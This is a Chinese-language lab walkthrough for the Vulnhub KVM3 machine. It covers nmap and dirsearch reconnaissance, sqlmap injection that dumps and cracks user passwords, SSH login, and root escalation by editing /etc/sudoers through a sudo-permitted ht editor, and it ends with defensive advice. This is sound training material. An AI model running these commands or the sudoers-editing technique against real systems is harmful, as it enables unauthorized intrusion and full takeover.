[Vulnhub] KVM3 (ht编辑器权限提升)

字数 1371 2025-08-19 12:41:50

KVM3 靶机渗透测试与权限提升教学文档

1. 信息收集阶段

1.1 目标识别

IP地址: 192.168.8.100
操作系统: Linux (Ubuntu/Debian)
开放服务:
- SSH (22/tcp) - OpenSSH 4.7p1
- HTTP (80/tcp) - Apache 2.2.8 with PHP 5.2.4-2ubuntu5.6

1.2 服务扫描

使用Nmap进行全面扫描:

nmap -p- -sV -sC 192.168.8.100 --min-rate 1000

扫描结果分析:

SSH版本较旧(OpenSSH 4.7p1)，可能存在漏洞
Web服务器运行Apache 2.2.8，PHP 5.2.4，这些版本较旧可能有已知漏洞

1.3 目录枚举

使用dirsearch进行目录扫描:

dirsearch -u "http://192.168.8.100/"

重要发现:

/gallery/ - 图片画廊目录
/phpmyadmin/ - phpMyAdmin管理界面
/modules/ - 模块目录
/core/fragments/moduleInfo.phtml - 可访问的模块信息文件

2. Web应用漏洞利用

2.1 识别Gallery应用

访问http://192.168.8.100/gallery/发现Gallarific图片画廊应用

2.2 搜索已知漏洞

searchsploit Gallarific

发现多个漏洞:

SQL注入漏洞 (php/webapps/15891.txt)
认证绕过漏洞 (php/webapps/31370.txt)
管理员信息修改漏洞 (php/webapps/8796.html)

2.3 SQL注入利用

使用sqlmap进行自动化注入:

# 枚举数据库
sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" --dbs --batch

# 枚举gallery数据库中的表
sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery --tables --batch

# 转储dev_accounts表数据
sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch

获取的凭据:

+----+----------------------------------+------------+
| id | password                         | username   |
+----+----------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e | loneferret |
+----+----------------------------------+------------+

密码哈希破解:

dreg的密码哈希对应明文"Mast3r"
loneferret的密码哈希对应明文"starwars"

3. 初始访问

3.1 SSH登录

使用获取的凭据尝试SSH登录:

ssh dreg@192.168.8.100
# 密码: Mast3r

ssh loneferret@192.168.8.100
# 密码: starwars

成功以loneferret用户登录系统

3.2 获取本地标志

cat /home/loneferret/Local.txt
# 内容: u28dt2i0

4. 权限提升

4.1 检查sudo权限

sudo -l

输出:

User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

分析:

可以以root身份无密码运行/usr/local/bin/ht
禁止以root身份运行/usr/bin/su

4.2 检查ht编辑器

ls -la /usr/local/bin/ht

发现ht编辑器具有SUID位设置

4.3 利用ht编辑器提权

4.3.1 解决终端问题

首次运行可能遇到终端错误:

/usr/local/bin/ht
# 错误: Error opening terminal: xterm-256color

解决方法:

export TERM=xterm

4.3.2 编辑sudoers文件

以root身份运行ht编辑器:

sudo /usr/local/bin/ht

在ht编辑器中:
- 按F3打开文件
- 输入/etc/sudoers并回车
- 找到loneferret的用户权限配置
- 修改为允许无限制sudo访问
- 按F2保存文件
示例修改内容:

loneferret ALL=(ALL) NOPASSWD: ALL

4.3.3 获取root shell

sudo /bin/bash

4.4 获取root标志

cat /root/Proot.txt
# 内容: d2ua8u2yd

5. 关键知识点总结

信息收集:
- 全面的端口扫描和服务识别是渗透测试的基础
- 目录枚举可以发现隐藏的Web应用路径
漏洞利用:
- 使用searchsploit查找已知应用漏洞
- sqlmap自动化SQL注入工具的使用
- 密码哈希破解技术
权限提升:
- 检查sudo -l查看可用特权命令
- 利用具有SUID位的程序
- 通过编辑器修改关键系统文件(如sudoers)实现提权
- 终端环境变量问题的解决方法
防御建议:
- 及时更新系统和应用软件
- 限制sudo权限，避免无密码sudo
- 移除不必要的SUID程序
- 对编辑器等程序设置合理的权限

KVM3 靶机渗透测试与权限提升教学文档 1. 信息收集阶段 1.1 目标识别 IP地址: 192.168.8.100 操作系统: Linux (Ubuntu/Debian) 开放服务: SSH (22/tcp) - OpenSSH 4.7p1 HTTP (80/tcp) - Apache 2.2.8 with PHP 5.2.4-2ubuntu5.6 1.2 服务扫描使用Nmap进行全面扫描: 扫描结果分析: SSH版本较旧(OpenSSH 4.7p1)，可能存在漏洞 Web服务器运行Apache 2.2.8，PHP 5.2.4，这些版本较旧可能有已知漏洞 1.3 目录枚举使用dirsearch进行目录扫描: 重要发现: /gallery/ - 图片画廊目录 /phpmyadmin/ - phpMyAdmin管理界面 /modules/ - 模块目录 /core/fragments/moduleInfo.phtml - 可访问的模块信息文件 2. Web应用漏洞利用 2.1 识别Gallery应用访问 http://192.168.8.100/gallery/ 发现Gallarific图片画廊应用 2.2 搜索已知漏洞发现多个漏洞: SQL注入漏洞 (php/webapps/15891.txt) 认证绕过漏洞 (php/webapps/31370.txt) 管理员信息修改漏洞 (php/webapps/8796.html) 2.3 SQL注入利用使用sqlmap进行自动化注入: 获取的凭据: 密码哈希破解: dreg的密码哈希对应明文"Mast3r" loneferret的密码哈希对应明文"starwars" 3. 初始访问 3.1 SSH登录使用获取的凭据尝试SSH登录: 成功以loneferret用户登录系统 3.2 获取本地标志 4. 权限提升 4.1 检查sudo权限输出: 分析: 可以以root身份无密码运行 /usr/local/bin/ht 禁止以root身份运行 /usr/bin/su 4.2 检查ht编辑器发现ht编辑器具有SUID位设置 4.3 利用ht编辑器提权 4.3.1 解决终端问题首次运行可能遇到终端错误: 解决方法: 4.3.2 编辑sudoers文件以root身份运行ht编辑器: 在ht编辑器中: 按F3打开文件输入 /etc/sudoers 并回车找到loneferret的用户权限配置修改为允许无限制sudo访问按F2保存文件示例修改内容: 4.3.3 获取root shell 4.4 获取root标志 5. 关键知识点总结信息收集 : 全面的端口扫描和服务识别是渗透测试的基础目录枚举可以发现隐藏的Web应用路径漏洞利用 : 使用searchsploit查找已知应用漏洞 sqlmap自动化SQL注入工具的使用密码哈希破解技术权限提升 : 检查sudo -l查看可用特权命令利用具有SUID位的程序通过编辑器修改关键系统文件(如sudoers)实现提权终端环境变量问题的解决方法防御建议 : 及时更新系统和应用软件限制sudo权限，避免无密码sudo 移除不必要的SUID程序对编辑器等程序设置合理的权限